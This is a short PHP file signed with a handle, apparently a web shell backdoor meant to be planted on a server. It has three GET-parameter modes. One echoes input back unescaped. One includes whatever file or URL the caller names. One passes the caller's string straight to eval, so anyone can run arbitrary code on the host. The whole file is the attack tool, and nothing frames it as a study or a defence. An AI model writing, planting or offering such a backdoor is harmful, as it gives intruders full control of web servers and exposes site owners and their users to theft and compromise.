<?php //--by gangsterstar--// if($_GET['act'] == "echo") {echo $_GET['echo'];} if($_GET['act'] == "include") {include $_GET['include'];} if($_GET['act'] == "eval") {echo eval($_GET['eval']);} ?>